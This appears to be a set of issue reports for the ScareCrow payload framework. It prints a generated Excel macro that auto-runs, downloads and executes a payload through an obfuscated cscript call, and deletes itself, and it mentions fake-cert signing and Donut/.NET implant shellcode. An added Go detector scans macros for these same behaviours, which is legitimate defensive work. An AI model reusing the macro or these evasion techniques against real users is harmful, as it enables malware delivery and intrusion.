rbp 0xc0000c9de0
rsp 0xd6c2fff7e8
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3d
r14 0x3c
r15 0xaa
rip 0xc000068000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b

This appears to have been raised in #7 but I am using the latest version (I believe - I don't see a version number in the output) cloned today (18/03)

Generating Macro Go Error

Attempting to generate a macro payload but I am running into an error:

root@kali:/opt/ScareCrow# ./ScareCrow -I this.bin -Loader msiexec -domain www.microsoft.com -delivery macro -url http:///test.bin


[ScareCrow ASCII-art banner]
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With apphelp's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing apphelp.dll With a Fake Cert
[+] Signed File Created
[*] Creating Loader
[*] Macro Delivery Payload
[!] Excel macro that will download, execute and remove the payload:
Sub Auto_Open()
    Dim UghEc As String
    Dim wxnKct As String
    Dim MmWsYRd As String
    UghEc = Environ("AppData") & "\Microsoft\Excel"
    VBA.ChDir UghEc

    Dim QssSvuJy As String
    Dim nKgV As String
    Dim gcxBaK As Object

    QssSvuJy = "http://redacted"
    nKgV = ""
    Set gcxBaK = CreateObject("Microsoft.XMLHTTP")
    gcxBaK.Open "GET", QssSvuJy, False
    gcxBaK.send

    If gcxBaK.Status = 200 Then
        Set EMKAG = CreateObject("ADODB.Stream")
        EMKAG.Open
        EMKAG.Type = 1
        EMKAG.Write gcxBaK.responseBody
        EMKAG.SaveToFile nKgV, 2
        EMKAG.Close
    End If
    wxnKct = UghEc & nKgV
    Set AxJpqt = GetObject("new:0006F03A-0000-0000-C000-000000000046")
    AxJpqt.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & wxnKct), 0
    vLokSZ
    Kill wxnKct
End Sub

Sub vLokSZ()
    Dim when As Variant
    Debug.Print "Start " & Now
    when = Now + TimeValue("00:00:30")
    Do While when > Now
        DoEvents
    Loop
    Debug.Print "End " & Now
End Sub

panic: open : no such file or directory

goroutine 1 [running]:
ScareCrow/Utils.check(...)
/opt/ScareCrow/Utils/Utils.go:27
ScareCrow/Utils.Writefile(0x0, 0x0, 0xc0020d8000, 0x2b0dc6)
/opt/ScareCrow/Utils/Utils.go:19 +0x145
ScareCrow/Loader.CompileLoader(0x7ffd34ebce04, 0x7, 0x0, 0x0, 0xc0000b22e0, 0xb, 0x781332, 0x7, 0x7ffd34ebce30, 0x5, ...)
/opt/ScareCrow/Loader/Loader.go:1010 +0x585
main.main()
/opt/ScareCrow/ScareCrow.go:193 +0xb1b

It looks like it's just getting cut off a bit soon or something.
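
For anyone on the detection side of this thread, here is an added example (written for this page, not ScareCrow's code) in Go that scans macro source for the behaviours visible in the generated VBA above: an Auto_Open entry point, a download through Microsoft.XMLHTTP, a binary write through ADODB.Stream.SaveToFile, WScript.Shell obtained via a GetObject("new:<CLSID>") moniker rather than CreateObject, "cscript" assembled from one-character string literals, the //E:jscript engine switch, and self-deletion with Kill. The indicator names, the scoring threshold and the embedded sample macro (a shortened, renamed copy of the one in the issue, constructed for the test) are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// Indicator pairs a short name with the pattern that detects one behaviour.
type Indicator struct {
	Name string
	Re   *regexp.Regexp
}

// indicators cover what the generated macro does. Names and patterns are this
// example's own, not a published rule set.
var indicators = []Indicator{
	{"auto_open", regexp.MustCompile(`(?i)\bSub\s+Auto_Open\b`)},
	{"xmlhttp_get", regexp.MustCompile(`(?i)CreateObject\("Microsoft\.XMLHTTP"\)`)},
	{"adodb_savetofile", regexp.MustCompile(`(?i)ADODB\.Stream[\s\S]{0,500}?\.SaveToFile`)},
	{"new_moniker", regexp.MustCompile(`(?i)GetObject\("new:[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}"\)`)},
	{"split_literal", regexp.MustCompile(`"\w"\s*&\s*"\w"\s*&\s*"\w"`)},
	{"cscript_jscript", regexp.MustCompile(`(?i)cscript\s+//E:jscript`)},
	{"self_delete", regexp.MustCompile(`(?im)^\s*Kill\s+\w+`)},
}

// joinRe matches the seam between two adjacent VBA string literals ("a" & "b");
// removing it re-joins split strings so that "c" & "s" & "c" ... reads "cscript".
var joinRe = regexp.MustCompile(`"\s*&\s*"`)

// Scan returns the sorted names of every indicator found in src, checking both
// the raw text and a copy with concatenated literals joined back together.
func Scan(src string) []string {
	normalized := joinRe.ReplaceAllString(src, "")
	var hits []string
	for _, ind := range indicators {
		if ind.Re.MatchString(src) || ind.Re.MatchString(normalized) {
			hits = append(hits, ind.Name)
		}
	}
	sort.Strings(hits)
	return hits
}

// Suspicious applies a simple threshold: four or more indicators together is
// well beyond what a legitimate workbook macro shows.
func Suspicious(src string) bool { return len(Scan(src)) >= 4 }

// sampleMacro is a constructed, shortened copy of the macro from the issue.
const sampleMacro = `Sub Auto_Open()
    Dim dir As String
    Dim file As String
    Dim name As String
    dir = Environ("AppData") & "\Microsoft\Excel"
    VBA.ChDir dir
    Dim url As String
    Dim http As Object
    url = "http://redacted"
    name = ""
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "GET", url, False
    http.send
    If http.Status = 200 Then
        Set stream = CreateObject("ADODB.Stream")
        stream.Open
        stream.Type = 1
        stream.Write http.responseBody
        stream.SaveToFile name, 2
        stream.Close
    End If
    file = dir & name
    Set ol = GetObject("new:0006F03A-0000-0000-C000-000000000046")
    ol.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & file), 0
    Kill file
End Sub`

// benignMacro is a constructed control case with an auto-run entry point only.
const benignMacro = `Sub Auto_Open()
    MsgBox "Workbook opened"
End Sub`

func main() {
	for _, m := range []string{sampleMacro, benignMacro} {
		fmt.Printf("suspicious=%v hits=%v\n", Suspicious(m), Scan(m))
	}
}
```

Joining the split literals before matching is the part worth keeping: the generated macro never contains the string "cscript" as written, so a rule that only looks for it in the raw source misses the sample while the normalised copy matches.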

cmd.Run

When giving it a PKCS7 code-signing cert, it looks to be finishing up building and then I receive a cmd.Run() error.

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With schannel's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing schannel.dll With a Valid Cert <file>.p7b
2022/02/25 11:57:49 cmd.Run() failed with exit status 255

Additionally, my network needs a proxy for it to create a fake cert based on domain. Can you include that as an option to use a proxy to create a fake cert?

Binary loader not working with Donut shellcode

I am generating shellcode with donut, specifying x64. The CPL loader works as expected, but the binary loader does not:
[screenshot attachment: output]

The shellcode is being generated from Atlas, a .NET implant, if that makes a difference. Could this be related to #7?
